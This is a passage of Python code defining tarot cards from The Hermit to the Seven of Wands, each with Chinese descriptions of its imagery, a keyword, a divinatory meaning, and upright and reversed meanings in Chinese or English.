init=False) the_hermit: TarotCard = field(default=TarotCard( id=9, index='the_hermit', type='major_arcana', orig_name='The Hermit (IX)', name='隐者', intro='身穿灰色斗篷和帽子的老人站在冰天雪地的山巅上,低头沉思,四周渺无人烟。他右手高高举着一盏灯,这是真理之灯,灯里是颗发亮的六角星,名称是所罗门的封印,散发出潜意识之光。老人左手拄着一根族长之杖,这跟杖在愚人、魔术师、战车都曾经出现过。愚人太过天真,不知杖的魔力,拿它来系包袱;魔术师用代表意识的右手运用杖的法力;战车把杖化为矛,也用右手紧握着;隐士则杖交左手,用以在启蒙之路上做前导。', words='探索', 
desc='隐士牌暗示着:省思的一段时间。\n\n隐士牌暗示一段反省的时间。它代表着一段想要让你的过去、现在,以及未来成为有意义的时间。这张牌代表去看咨商辅导员、持续一段梦想之旅,或为了开发你自己的沉思。它也代表成熟,以及你已经知道生命中真正重要的是什么。\n\n它可能意味着得到身体或心灵上的协助及智因;或是你帮助其他人发现人生理解及事件的导因。它也代表一段时间内,你会问自己如下的问题:我从何处来?我现在位于何处?又将往何处去?', upright='有骨气的、清高的、有智慧的、有法力的、自我修养的,生命的智慧情境、用智慧排除困难的、给予正确的指导方向、有鉴赏力的、三思而后行的、谨慎行动的。', reversed='假清高的、假道德的、没骨气、没有能力的、内心孤独寂寞的、缺乏支持的、错误的判断、被排挤的、没有足够智慧的、退缩的、自以为是的、与环境不合的。' ), init=False) wheel_of_fortune: TarotCard = field(default=TarotCard( id=10, index='wheel_of_fortune', type='major_arcana', orig_name='Wheel of Fortune (X)', name='命运之轮', intro='所有的大牌都有人物,命运之轮是唯一的例外,可见这张牌独树一格。深蓝色的天空悬着一个轮子,轮盘由三个圆圈构成(教宗的头冠也是),最里面的小圈代表创造力,中间是形成力,最外层是物质世界。小圈里头没有任何符号,因为创造力潜能无限;中间圆圈里有四个符号,从上方顺时针依序是炼金术中的汞风、硫、水,分别与风火水土四要素相关联,是形成物质世界的基本要素﹔最外层就是物质世界,上右下左四方位分别是TARO四个字母,这四个字母可以组成Rota(轮)、Orat(说)、Tora(律法)、Ator(哈扥尔女神),形成一个完整的句子“塔罗之轮述说哈扥尔女神的律法”,其余四个符号是希伯来字母YHVH,是上帝最古老的名字。轮盘从中心放射出八道直线,代表宇宙辐射能量。\n\n在轮盘左方有一条往下行进的蛇,是埃及神话中的邪恶之神Typhon,牠的向下沉沦带着轮子进入分崩离析的黑暗世界。相反的,背负轮盘的胡狼头动物渴求上升,牠是埃及神话中的阿努比神(Anubis)。而上方的人面狮身兽是智慧的象征,均衡持中,在变动中保持不变。牠拿着的宝剑代表风要素,表示心智慧力、思考力和智慧。\n\n四个角落的四只动物,从右上方顺时针看分别是老鹰、狮子、牛、人,而且他们都有翅膀。这四个动物出自圣经启示录第四章“宝座周围有四个活物,前后遍体都满了眼睛。第一个活物像狮子,第二个像牛犊,第三个脸面像人,第四个像飞鹰”,耶路撒冷圣经提到四活物象征四位福音书的作者(马太、马可、路加和约翰)。在占卜上这四个动物与占星学产生关联,分别代表四个固定星座和四要素,老鹰是天蝎座(水),狮子是狮子座(火),牛是金牛座(土),人是水瓶座(风)。牠们都在看书,汲取智慧,而翅膀赋予牠们在变动中保持稳定的能力。', words='轮回', desc='命运之轮意味着你境遇的改变。观察这个改变,并留意它的模式。\n\n生命是变化无常的,当牌面上的命运之轮是正立时,改变似乎是有利的;而当它倒立时,改变又似乎是有害的。它只是改变,而似乎有害的改变,事实上可能会是一种祝福。你必须超越现状,将眼光放远,来观察生命的消长。\n\n通常命运之轮象征你生命境遇的改变。或许你并不了解这些改变的原因,不过在这里,你如何因应改变是比较重要的。你要迎接生命所提供给你的机会,还是要抗拒改变呢?此牌正立时就是在告诉你,要去适应这些改变。', upright='忽然而来的幸运、即将转变的局势、顺应局势带来成功、把握命运给予的机会、意外的发展、不可预测的未来、突如其来的爱情运变动。', reversed='突如其来的厄运、无法抵抗局势的变化、事情的发展失去了掌控、错失良机、无法掌握命运的关键时刻而导致失败、不利的突发状况、没有答案、被人摆布、有人暗中操作。' ), init=False) justice: TarotCard = field(default=TarotCard( id=11, index='justice', type='major_arcana', orig_name='Justice (XI)', name='正义', 
intro='一个女人端坐在石凳上,右手持剑高高举起,左手在下拿着天秤。身穿红袍,头戴金冠,绿色披肩用一个方形扣子扣起。她的右脚微微往外踏出,似乎想站起来,而左脚仍隐藏在袍子里面。她高举宝剑,象征她的决心。宝剑不偏不倚,象征公正,且智慧可以戳破任何虚伪与幻象。宝剑两面都有刃,可行善可行恶,端看个人选择。左手的金色天秤和披肩的绿色都是天秤座的象征。手持天秤表示她正在评估,正要下某个决定,同时追求平衡。胸前的方形扣子中间是个圆形,象征四要素的调和。头上的金冠中心有个四方形宝石,加上金冠的三个方顶,加起来得到数字七,代表金星,也就是天秤座的守护星。后方是个紫色帷幕,象征隐藏的智慧。两边柱子象征正面和负面的力量。', words='均衡', desc='正义意味,这是一段你为你的人生决定负起责任的时光。\n\n正义意味事情已经达成它应有的使命。也就是说,你过往的决定或行为已经引导你走到了目前的境遇。你已经得到你应得的了,如果你对自己是够诚实的话,你肯定知道这点。它代表你应该对自己,以及周遭的人绝对的诚实。你应该自己,以及使你成为今天这个样子的种种决定负起责任。你的未来可能会因为你目前的决定、行为或理解而改变。', upright='明智的决定、看清了真相、正确的判断与选择、得到公平的待遇、走向正确的道路、理智与正义战胜一切、维持平衡的、诉讼得到正义与公平、重新调整使之平衡、不留情面的。', reversed='错误的决定、不公平的待遇、没有原则的、缺乏理想的、失去方向的、不合理的、存有偏见的、冥顽不灵的、小心眼、过于冷漠的、不懂感情的。' ), init=False) the_hanged_man: TarotCard = field(default=TarotCard( id=12, index='the_hanged_man', type='major_arcana', orig_name='The Hanged Man (XII)', name='倒吊人', intro='倒吊人图案简单,涵义却深远。我们看到一个男人在一棵T字形树上倒吊着。他两手背在背后,形成一个三角形。两腿交叉形成十字。十字和三角形结合在一起,就是一个炼金符号,象征伟大志业的完成,也象征低层次的欲望转化到高层次的灵魂(炼成黄金)。\n\n红裤子象征身心灵中的“身”,也就是人类的欲望和肉体。蓝上衣即身心灵中的“心”,象征知识。他的金发和光环象征智慧和心灵的进化,也就是“灵”。金色的鞋子则象征倒吊人崇高的理想。在某些版本的塔罗牌中,倒吊人就是神话中的奥丁(Odin),他身后的树就是北欧神话中的义格卓席尔巨树(Yggdrasil),也称作世界之树,由地狱(潜意识)开始生长,经过地面(意识),直达天庭(超意识)。还记得皇帝右手拿着一根象征生命的古埃及十字架吗?古埃及十字架代表希伯来的第十九个字母Tau,是属于世间的一个字母,而倒吊人倒吊的T字树,正是它的下半部,表示倒吊人仍然是入世的。', words='牺牲', desc='“以将有更美好的事物降临于你身上的信念,顺从于人生”是倒吊人这张牌所传达的讯息。\n\n倒吊人是一张代表投降的牌。它暗示,当你在这段期间内,透过对生命的顺从,并让它引领你到你需要去的地方,那么你便可以获益良多。\n\n倒吊人还是一张代表独立的牌。这段期间内,你应该顺着感觉走,或是接受自己,即使别人都认为你的方式很奇怪也不打紧。它也可能象征,经历了生命中一段艰难的时光后的心灵平静。\n\n现在不是挣扎的时候,静下来好好思考你过去的行为,以及未来的计划。这只是一个暂时的状态,只要你妥善的运用这段时间,对你应该是有好处的。让生命中的事物自然而然的发生,或许你会对结果感到惊喜。带着“会有更美好的事情临降,来取代你所捐弃的事物”的信念,顺从于人生。花点时间来观察潜伏于事件底下的生命潮流。生命会给你一段宁静的时光,远离世界的纷纷扰扰,所以善用这段时光将是明智之举。', upright='心甘情愿的牺牲奉献、以修练的方式来求道、不按常理的、反其道而行的、金钱上的损失、正专注于某个理想的、有坚定信仰的、长时间沈思的、需要沈淀的、成功之前的必经之道。', reversed='精神上的虐待、心不甘情不愿的牺牲、损失惨重的、受到亏待的、严重漏财的、不满足的、冷淡的、自私自利的、要求回报的付出、逃离綑绑和束缚、以错误的方式看世界。' ), init=False) death: TarotCard = field(default=TarotCard( id=13, index='death', type='major_arcana', orig_name='Death (XIII)', name='死神', 
intro='传统的死神牌,通常是由骷髅人拿着镰刀来代表,而伟特将死神的意象提升到更深一层的境界。\n\n最显眼的就是那位骑着白马的骷髅骑士。他身边有四个人,国王、主教、女人、小孩,象征无论是世俗或出世、男或女、老或少,都逃不过死亡这个自然现象。国王抗拒死亡,被骷髅骑士践踏过去﹔主教的权杖掉在地上,双手合十崇敬死亡﹔女人跪下,别过脸不忍看﹔小孩不懂死亡,好奇的望着骷髅骑士。其中主教可能就是编号五的教宗牌,他掉落在地上的权杖象征世俗权力遇到死亡时毫无用处,仔细一看权杖顶似乎有三层圆圈,和教宗牌戴在头上的权冠相同,而主教头上戴的帽子状似尖尖的鱼头,代表双鱼世纪的结束,也可能暗示死神牌关联的希伯来文Nun,意思是鱼。跪着的女人可能是力量牌中的那位女性,她们的衣着与头冠都极为相似。再回到骷髅骑士,他头上那根红羽毛和愚人所戴的是同一根,他的旗帜是黑色背景,象征光芒的不存,上面五瓣蔷薇的图案是蔷薇十字会的图腾,关于此图腾的说法众多,可能是代表随着死亡而来的新生,另一说是象征火星与生命力,还有一说是象征美丽纯洁与不朽。远方的河流就是流经伊甸园的四条河流之一,称为冥河(Styx),象征川流不息的生命循环。河上有艘船,船的上方有个类似洞穴的地方,右方有个箭头(在死神的脚跟处)指向洞穴,这个洞穴可能是“神曲”一书中但丁前往阴间的通道,而牌中右方一条小径通往两座塔中(月亮和节制都有相同背景,这两座塔也可能是女祭司背后的柱子),代表通往新耶路撒冷的神秘旅程。象征永生的朝阳在两座塔间升起,似乎在告诉我们死亡并不是一切的终点。', words='结束', desc='死亡牌意味某种状况的结束。\n\n死亡为旧事物画上休止符,并让路给新事物。死亡牌代表改变的一段其间。我们可以这样说,生命中的某个章节就要结束了,而你对这份改变的接纳,将是变化自然而然地发生。\n\n抱持着“生命将会带来某些比它从你身上拿走的更美好的东西”的信念。在潜意识中,你或许也在渴望改变的发生,死亡牌即意味着改变正要出现。不要抗拒这份改变,试着去接纳它吧。', upright='必须结束旧有的现状、面临重新开始的时刻到了、将不好的过去清除掉、专注于心的开始、挥别过去的历史、展开心的旅程、在心里做个了结、激烈的变化。', reversed='已经历经了重生阶段了、革命已经完成、挥别了过去、失去了、结束了、失败了、病了、走出阴霾的时刻到了、没有转圜余地了。' ), init=False) temperance: TarotCard = field(default=TarotCard( id=14, index='temperance', type='major_arcana', orig_name='Temperance (XIV)', name='节制', intro='十四号的节制牌,出现在死神牌之后。大天使麦可手持两个金杯,把左手杯中的水倒入右手杯中。\n\n金发的天使身着白袍,背长红翅膀,胸前有个方形图案(地元素),中间是个橘色的三角形(火元素),同样的图案在正义牌中也可看到。天使头上则戴个饼图案,中间有一个小点,是炼金术中代表黄金的符号,也就是终极目标。天使脸上闪耀着和谐的光辉,怡然自在,他/她的右脚踏入象征潜意识的池塘中,左脚站在象征显意识的岸边石头上,代表两者之间的融合。塘边生长一丛爱丽斯花。远方有一条小径通往淡蓝色的两座山间,双山顶间闪耀着王冠般的金色光芒,类似如此的图像也曾出现于前一张死神牌中的小径、双塔与朝阳。恋人与审判牌中也有天使的出现。另外,大天使对应希腊神话中的彩虹之神,暴风雨后的彩虹,意味着节制牌已经从死神带给我们的恐惧中超脱出来了。整张牌带给人宁静祥和的感受,让人们明白死亡之后终获新生。', words='净化', desc='节制代表行动及感情的融合,带来内心的平静感觉。\n\n节制是一张代表行为,而非观念的牌。它代表对某种特定状况的适当行为。显示一种因为行为及情绪的结合,而带来内在平静的感觉。节制意味着结合自发性及知识的能力,运用精神的知识及理解力来调节行为的能力。它是指知道每种状况来临时,应该采取什么适当的反映或行为。\n\n节制牌暗示你较高层次的自我,和较低层次的自我可以和谐共存。你带着一种方向感行动,不管那是精神上或实质上的行动。它代表尽力而为,以达到你可以达到的境界。', upright='良好的疏导、希望与承诺、得到调和、有节制的、平衡的、沟通良好的、健康的、成熟与均衡的个性、以机智处理问题、从过去的错误中学习、避免重蹈覆辙、净化的、有技巧的、有艺术才能的。', reversed='缺乏能力的、技术不佳的、不懂事的、需反省的、失去平衡状态、沟通不良的、缺乏自我控制力、不确定的、重复犯错的、挫败的、受阻碍的、暂时的分离、希望与承诺遥遥无期。' ), 
init=False) the_devil: TarotCard = field(default=TarotCard( id=15, index='the_devil', type='major_arcana', orig_name='The Devil (XV)', name='恶魔', intro='在恶魔牌上,我们看到和恋人相似的构图,只是恋人牌的天使在这里换成了恶魔,而亚当夏娃已然沉沦,上天的祝福变成了诅咒。\n\n牌中的恶魔有蝙蝠翅膀、羊角、羊腿和鸟足,象征动物的本能与天性。牠的驴耳则代表固执。恶魔头上的倒立星币,顶端指向地面,代表物质世界。恶魔右手向上摆出黑魔法的手势,与教宗的祝福手势形成对比。手心的符号代表土星,限制与惰性之星,也是魔羯座的守护星。恶魔左手则持着火炬,同样向下导引到物质世界,似乎在煽动亚当的欲望。注意恶魔坐的地方并不是三度空间的立方体,而是二度空间的长方形,象征人们只看见感官所见的现实,却非全部的真实,好比瞎子摸象。前方的亚当夏娃同样长出角和尾巴,显露出野兽本能。亚当的尾巴尖端是朵火焰,夏娃则是葡萄,都是恋人牌树上结的果实,表示她们误用了天赋。两个人被铁链锁住,乍看无处可逃,但仔细一看,其实系在她们脖子上的链子非常的松,只要愿意,随时可以挣脱,但她们却没有,表示这个枷锁是他们自己套在自己身上的。恶魔牌背景全黑,光芒不存,代表精神上的黑暗。', words='诱惑', desc='魔鬼牌代表错以为别无选择。\n\n魔鬼牌代表一种错误的概念,认为事情别无选择。觉得“我所拥有的就是这些”或“这是我唯一的选择”。在宗教的前因后果当中,魔鬼引诱男人使它遗忘掉精神的探索,以及他的神圣目的。在一般性的占卜中,魔鬼代表一种控制生命的需求,你对与自己的可能性缺乏完整的关照。\n\n魔鬼牌描述的是一种对生命物质化的观点,或像王尔德(OscarWilde)所说的:“知道所有东西的价格,却不知道任何东西的价值。”它可能暗示在某种状况内受到限制,却不愿意去改变。它是一种“偷鸡摸狗胜过杀人放火”的态度。', upright='不伦之恋、不正当的欲望、受诱惑的、违反世俗约定的、不道德的、有特殊的艺术才能、沉浸在消极里、沉溺在恐惧之中的、充满愤怒和怨恨、因恐惧而阻碍了自己、错误的方向、不忠诚的、秘密恋情。', reversed='解脱了不伦之恋、挣脱了世俗的枷锁、不顾道德的、逃避的、伤害自己的、欲望的化解、被诅咒的、欲望强大的、不利的环境、盲目做判断、被唾弃的。' ), init=False) the_tower: TarotCard = field(default=TarotCard( id=16, index='the_tower', type='major_arcana', orig_name='The Tower (XVI)', name='塔', intro='一座位于山巅上的高塔,被雷击中而毁坏,塔中两人头上脚下的坠落。塔顶有个王冠受雷殛而即将坠落。塔象征物质,王冠象征统治和成就,也代表物质与财富,受雷一殛,便荡然无存。天上的落雷是直接来自上帝的语言,两旁的火花有二十二个,象征塔罗二十二张大牌。灰色的云降下灾难之雨,不分性别阶级,平等的落向每一个人。背景全黑,这是一段黑暗的时期。', words='毁灭', desc='高塔象征生命中无可避免的改变。\n\n这种改变是是从根基到顶端的完全崩解与毁灭,是一种无可挽救的崩溃。这种改变是突然而来的,有时候激烈无比,这是一种易于顺从而难以抗拒的改变。当高塔牌出现时,便是到了改变的时刻。现在再来为改变做准备,或选择如何改变都已太迟,现在你需要做的就是丢掉旧东西。', upright='双方关系破裂、难以挽救的局面、组织瓦解了、损失惨重的、惨烈的破坏、毁灭性的事件、混乱的影响力、意外的发展、震惊扰人的问题、悲伤的、离别的、失望的、需要协助的、生活需要重建的。', reversed='全盘覆没、一切都已破坏殆尽、毫无转圜余地的、失去了、不安的、暴力的、已经遭逢厄运了、急需重建的。' ), init=False) the_star: TarotCard = field(default=TarotCard( id=17, index='the_star', type='major_arcana', orig_name='The Star (XVII)', name='星星', 
intro='一位赤裸的金发女子,左膝跪在象征显意识的地面上,右脚踏在象征潜意识的池水里。她左右手各持一个水壶,壶中装的是生命之水,她右手壶的水倾倒入池,激起阵阵涟漪,左手壶的水则倒在青翠的草地上,分成象征人类五种感官的五道水流,其中一道又流回池塘,再度充实潜意识之泉。她身后有棵树,树上有只象征智慧的朱鹭,同时也代表埃及神话中的托特之神,是所有艺术的创造者。女子的后方则是一大片广阔开满花的草原,和一座山脉,天空一颗巨大的金色八角星,七颗白色的小八角星则环绕在四周。', words='希望', desc='星星牌意味创造力和对生命的可能性的信心。\n\n星星是一张代表重新点燃希望的牌。它代表相信明天会更好的内在信心。你可以直接体验潜意识,而不是它的种种符号或意象。你可以体验这种强而有力的能量,并将它导入你的生命中。例如,艺术家利用这种能量来工作,以创作某些足以触动观赏者心情和灵魂的作品。它是一张代表信心、希望和内在平静的牌。', upright='未来充满希望的、新的诞生、无限的希望、情感面精神面的希望、达成目标的、健康纯洁的、美好的未来、好运即将到来、美丽的身心、光明的时机、平静的生活、和平的处境。', reversed='希望遥遥无期的、失去信心的、没有寄托的未来、失去目标的、感伤的、放弃希望的、好运远离的、毫无进展的、过于虚幻、假想的爱情运、偏执于理想、希望破灭的。' ), init=False) the_moon: TarotCard = field(default=TarotCard( id=18, index='the_moon', type='major_arcana', orig_name='The Moon (XVIII)', name='月亮', intro='相较于其它的牌,月亮整体呈现的图面经常令人感到诡异。近景是一只龙虾爬出池塘的景象,龙虾象征比恐惧和兽性更深的情绪,伟特说牠总是爬到一半又缩回去。中景处有频频吠叫的一只狗和一匹狼,分位于左右两边,分别象征人类内心中已驯化和未驯化的兽性。中间有一条通往两塔之间,延伸向远处山脉的小径上,这条小径是通往未知的出口,只有微弱的月光映照着。一轮月亮高挂空中,总共有三个层次,最右边的是新月,最左边的是满月,而中间的女人脸孔则是伟特所谓的“慈悲面”,从新月渐渐延伸向满月,越来越大。月亮的外围则有十六道大光芒,和十六道小光芒,其下有十五滴象征思想之露珠。', words='不安', desc='月亮象征倾听你的梦,以找到内心世界的平静。\n\n想象是相当强而有力的,它可以让内心很快的产生和平、和谐和欢乐;它也可以以同样快的速度产生痛苦、惊惧、悲伤和愤怒。月亮是一张代表梦和想象的牌。梦是转化为意象的潜意识能量。当这股能量强烈到无法被吸收或理解时,可能会导致狂野的梦、噩梦,甚至疯狂。月亮牌所代表的潜意识恐惧,必须由我们单独去面对。\n\n月亮代表强烈的梦想和经由梦传达到你意识思想中的直觉。强而有力的梦企图告诉你某些事情。倾听你的梦,你将会发现你所要找寻的答案。', upright='负面的情绪、不安和恐惧、充满恐惧感、阴森恐怖的感觉、黑暗的环境、景气低落、白日梦、忽略现实的、未知的危险、无法预料的威胁、胡思乱想的、不脚踏实地的、沉溺的、固执的。', reversed='度过低潮阶段、心情平复、黑暗即将过去、曙光乍现、景气复甦、挥别恐惧、从忧伤中甦醒、恢复理智的、看清现实的、摆脱欲望的、脚踏实地的、走出谎言欺骗。' ), init=False) the_sun: TarotCard = field(default=TarotCard( id=19, index='the_sun', type='major_arcana', orig_name='The Sun (XIX)', name='太阳', 
intro='可爱的裸体孩童骑在马背上,跨越灰色的围墙,脸上带着微笑。\n\n孩童头上戴着雏菊花环,以及一根红色的羽毛。这根羽毛就是在愚人与死神出现的同一根,象征太阳牌已经跨越了死亡的界限,而重获新生。围墙后面种满向日葵,里头是一座人造的花园,而孩童跃离了花园,代表他不需要这些人工的产物,他是最纯真、自然、不需隐藏的,如同他一丝不挂的身体。向日葵共有四朵,象征四要素昂与小阿尔克那的四个牌组。有趣的是,四朵向日葵是向着孩童,而不是太阳,表示这位快乐的孩童已经拥有足够的能量。马匹背上没有马鞍,孩童不用缰绳控制牠,甚至连双手也不用,显示马匹象征的能量已经受到充分控制。孩童左手持着红色旗帜,左手象征潜意识,红色旗帜象征行动,表示他已经不用像战车那样用象征意识的右手来掌控,他可以轻而易举、自然的控制一切。背景的太阳是生命的源头,万物赖以维生之源,总共有21道光芒,代表愚人以外的21张大阿尔克那,仔细一看在上方罗马数字的旁边有一道黑色的曲线光芒,代表愚人(另有一说是太阳中心圆形的部分是愚人)。这样的更改是为了避免原本的暧昧。', words='生命', desc='太阳象征欢乐、内在的平和,以及表达自我的需求。\n\n它也代表理解到幸福是一种选择。太阳代表一种令人愉悦的解脱。它表示觉醒的力量足以驱逐黑暗。它代表一种表达内在无意识和潜意识力量的天赋趋力。它是充满希望、理想主义,以天真率直的。\n\n太阳象征欢乐和内在平静,而且感觉宇宙是一个充满乐趣和创造性的地方。太阳是自由的充分显现。它从意识层心智的日常限制中彻底解放,转为一种开放、觉醒及自由状态。它是一种可以带来肉体自由的内心自由。太阳显示出欢乐、和平、幸福及有创意的生活态度,并且深深体会到生命之美。', upright='前景看好的、运势如日中天的、成功的未来、光明正大的恋情、热恋的、美满的婚姻、丰收的、事件进行顺畅的、物质上的快乐、有成就的、满足的生活、旺盛。', reversed='热情消退的、逐渐黯淡的、遭遇失败的、分离的、傲慢的、失去目标的、没有远景的、失去活力的、没有未来的、物质的贫乏、不快乐的人生阶段。' ), init=False) judgement: TarotCard = field(default=TarotCard( id=20, index='judgement', type='major_arcana', orig_name='Judgement (XX)', name='审判', intro='天使加百列(Gabriel)在空中居高临下吹号角,号角口处有七条放射状的线,象征七个音阶,能够将人类从物质世界的限制解放出来,并且疗愈人们的身心。\n\n喇叭绑着一张正方形红十字旗帜,象征业力的平衡。天使下方是个象征潜意识的海洋,在女祭司帘幕后面就曾出现过,如今已接近终点。海洋上漂浮着许多载着人的棺材,棺材象征物质世界的旧模式。棺材中人全都是灰色的,其中最显眼的是一位象征显意识的男性,含蓄地仰望天使;一位象征潜意识的女性伸出双手,大方迎接天使的呼唤;以及象征重生人格的小孩,背对着我们。远处则是白雪霭霭的高山,伟特说这是抽象思考的顶峰。', words='复活', desc='审判象征清晰的判断力。\n\n审判牌意指你对人生的老旧观念已经死亡,你正在接受内心的召唤,去过一种更有意义的生活。审判牌代表此时你有清晰的判断力。作为问题的答案,这牌暗示你拥有清晰的判断力。此时你理解了你由生命所展示的试炼及挑战中学习到了什么。\n\n审判牌也可能是在形容你了解你的精神目的,也知道要达成它的必要步骤。它代表你能清楚地看到自己,以及生命的时光。这会使你对如何开始又有何收获,产生莫大的喜悦或惊慌。收成十分就近了,你可以用你的正直和诚实来面对你的报偿。现在你审判你自己,如果你没有得到所希望的,实在也没有藉口可推诿了,因为你收割的正是你努力的产物。', upright='死而复生、调整心态重新来过、内心的觉醒、观念的翻新、超脱了束缚的、满意的结果、苦难的结束、重新检视过去而得到新的启发、一个新的开始、一段新的关系。', reversed='不公平的审判、无法度过考验的、旧事重演的、固执不改变的、自以为是的、对生命的看法狭隘的、后悔莫及的、自责的、不满意的结果、被击垮的。' ), init=False) the_world: TarotCard = field(default=TarotCard( id=21, index='the_world', type='major_arcana', orig_name='The World (XXI)', name='世界', 
intro='终于来到愚人旅程的终点。一位赤裸的舞者自由地在空中跳舞,她外貌看起来虽是女的,但在许多版本的塔罗牌中,她是雌雄同体,象征愚人终于成功将阴阳两股力量融合。\n\n舞者身体缠绕着象征高贵与神圣的紫色丝巾,象征神性其实就在每个人身上。舞者轻柔随意地手持两根权杖,象征进化与退化的力量,她同时具备两者。舞者身旁环绕着一个椭圆桂冠,桂冠象征成功,而它围绕成的椭圆形就像愚人的0号形状,愚人无限的潜力,在世界牌中发挥得淋漓尽致。桂冠上下各有一条红巾缠绕,形成倒8符号,象征无限与永恒,这在魔术师与力量牌都曾出现过。在图中四角有人、老鹰、狮子、牛,这些符号曾经在命运之轮出现过,牠们在命运之轮中还拿著书汲取知识,最后在世界牌中完成使命。', words='达成', desc='世界描述一种来自内心的快乐,它也可能暗示持久的成功。这是一张象征永久和持续成功的牌。你已经到达了成功之门的前方,成功女神让你耐心等待,她会让你进入成功之门的,只不过是时间问题罢了。成功之门周围是你经历过的幸福与哀伤,成功与失败,在到达乐土之前回忆一下过去的时光是很有必要的。这张牌暗示只要你拥有一颗感恩的心,就必能在你为自己打造的美丽世界中,寻找到幸福与快乐。\n\n牌的本意是“达成”,它告诉我们所有的事情都可以达成,所有的梦想都可以成为现实,没有不可能得到的事物。只要有耕耘,就能有相应的收获。', upright='完美的结局、重新开始的、生活上的完美境界、获得成功的、心理上的自由、完成成功的旅程、心灵的融合、自信十足带来成功、生活将有重大改变、获得完满的结果。', reversed='无法完美的、一段过往的结束、缺乏自尊的、感觉难受的、态度悲观的、丑恶的感情、无法挽回的局势、不完美的结局、无法再继续的、残缺的。' ), init=False) ace_of_wands: TarotCard = field(default=TarotCard( id=22, index='ace_of_wands', type='minor_arcana', orig_name='Ace of Wands', name='权杖首牌', intro='一只手从云中伸出,强而有力,握住一根长满绿叶的权杖。那根权杖是如此茂盛,以致鲜嫩的绿叶几乎从杖上“爆”开,有八片叶子脱离权杖,在空中飞舞。遍地青草溪流。远方的城堡似乎暗示着未来成功的可能。', words='行动', desc='权杖首牌暗示这是一个好的开始,放开手脚勇敢做。\n\n权杖首牌表示实践计划的能量和欲望。权杖首牌象征一个计划强而有力的开始,代表着手新计划的渴望、力量与勇气。这张牌推出已经开始的行动,而且一定会产生具体的结果,与纸上谈兵完全不同。首牌出现在采取行动的时候,他们不是代表任何的计划于决定,而是发动新事物的具体行为。', upright='Creation, Willpower, Inspiration, Desire, Creative spark, New initiative, New passion, Enthusiasm, Energy', reversed='Lack of energy, Lack of passion, Boredom, Delays, Blocks, Hesitancy, Creative blocks' ), init=False) two_of_wands: TarotCard = field(default=TarotCard( id=23, index='two_of_wands', type='minor_arcana', orig_name='Two of Wands', name='权杖二', intro='一位身穿领主服装的男子,站在他的城墙上,俯视他的辽阔领土,遥望远方海洋。他右手拿着一颗类似地球仪的球体,左手扶着一根权杖。右边的权杖则是被铁环系在墙上。城墙上有个白百合与红玫瑰交叉的图案,白百合象征纯洁的思想,红玫瑰象征热情,暗示两者之间必须取得平衡。', words='决定', desc='权杖二意味着一个决定。\n\n权杖二并不代表具体的行动,而是决定本身,通常是身体上的决定。行动是由权杖一所代表。在决定行动之前,权杖二代表对选择的评估,它是你所习惯的东西与你所想拥有的东西之间的一个抉择。\n\n权杖二暗示因成长而不满当前环境,需要决定未来行动方向的时机。他表示你目前所拥有的事实是不够的,你将决定下一步要怎么做。', upright='Planning, Making decisions, Leaving home, First steps, Leaving comfort, Taking risks', reversed='Fear of change, 
Playing safe, Bad planning, Overanalyzing, Not taking action, Playing it safe, Avoiding risk' ), init=False) three_of_wands: TarotCard = field(default=TarotCard( id=24, index='three_of_wands', type='minor_arcana', orig_name='Three of Wands', name='权杖三', intro='山巅上站着一个成功的商人,三根权杖笔直地竖立在地面上,商人右手握着其中一根,目送自己的贸易船出海。天空是鲜明的黄色,海映着天,也是黄色。', words='远见', desc='权杖三意味着面向远方,你的未来在你的眼光里。\n\n权杖三可以表示旅行或将计划付诸实行。可以代表当你寻求自我内在意义的时候,你仍可保持相对的沉静;表示你一边在扩展自身内在于外的新大道与利益,一边在维持一种平衡的状态。权杖三同时也暗示你正在考虑你最近的状况,并且寻找你内在与外在的意义。', upright='Looking ahead, Expansion, Rapid growth, Momentum, Confidence, Growth, Foresight', reversed='Obstacles, Delays, Frustration, Restriction, Limitations, Lack of progress' ), init=False) four_of_wands: TarotCard = field(default=TarotCard( id=25, index='four_of_wands', type='minor_arcana', orig_name='Four of Wands', name='权杖四', intro='四根巨大的权杖耸立在前方,其上挂着象征胜利的花环。两位女子手持花束高举头顶欢庆舞蹈着,远方隐约可见庆祝的人群,呈现一幅和谐且繁荣的景象。右边有护城河上有座桥,通往远方的表示稳固庄园城堡。', words='稳定', desc='权杖四意味着坚定牢固的合作。\n\n权杖四描出一个坚固的家庭或工作环境,欢乐与分享是每天生活的一部分。权杖四代表坚固,将权杖三中所决定的计划变得稳固或实在的行为。它经常暗示搬入新家或换工作,也表示你在目前的环境中安定下来。', upright='Community, Home, Celebration, Celebrations, Reunions, Parties, Gatherings, Stability, Belonging', reversed='Lack of support, Transience, Home conflicts, Instability, Feeling unwelcome, Lack of roots, Home conflict' ), init=False) five_of_wands: TarotCard = field(default=TarotCard( id=26, index='five_of_wands', type='minor_arcana', orig_name='Five of Wands', name='权杖五', intro='迥异于权杖四的和谐稳定局面,权杖五呈现一群年轻人混战的场面。每个人手上都拿着一根杖,彼此僵持不下,谁也不让谁。伟特说:这是一场模仿的战役。', words='冲突', desc='权杖五暗示缺乏和谐或者内在的冲突。\n\n权杖五是一张代表冲突的牌,虽然冲突不至于伤害任何人,但却是所有人全盘卷入。只是权杖类型的天性,总是把生活看成战争,因为如果没有障碍,就没有冒险了。而从另外一方面来看,这张牌比较可以形容成比较,较量,竞争。', upright='Competition, Rivalry, Conflict, Arguments, Aggression, Tension, Rivals, Clashes of ego', reversed='Avoiding conflict, Respecting differences. 
end of conflict, Cooperation, Agreements, Truces, Harmony, Peace' ), init=False) six_of_wands: TarotCard = field(default=TarotCard( id=27, index='six_of_wands', type='minor_arcana', orig_name='Six of Wands', name='权杖六', intro='一位年轻男子,戴着胜利的桂冠,骑着白马凯旋而归。四周都是围绕簇拥着他的群众。白色代表纯洁,马象征力量。红色的外衣象征积极主动与热忱。男子手持的权杖饰以胜利花环。艰辛奋斗已然过去,他现在抬头挺胸,享受属于他的荣耀时刻。', words='自信', desc='权杖六暗示着对人生充满自信的态度。\n\n在这张牌中,火的乐观主义使其欲求和期望得到成功。这不是错误的乐观主义或虚无的期待,而是来自过去的成功及自信的一种真正的信仰。权杖六也表示工作的升迁、证实达成目标,或仅是一种自信的生活态度。', upright='Victory, Success, Public reward, Triumph, Rewards, Recognition, Praise, Acclaim, Pride', reversed='Excess pride, Lack of recognition, Punishment, Failure, No rewards, Lack of achievement' ), init=False) seven_of_wands: TarotCard = field(default=TarotCard( id=28, index='seven_of_wands', type='minor_arcana', orig_name='Seven of Wands', name='权杖七', intro='绿衣男子站在青葱的山顶上,手持权杖,奋力迎击敌人从山下攻上的六根权杖。他高举右手,表情坚毅。', 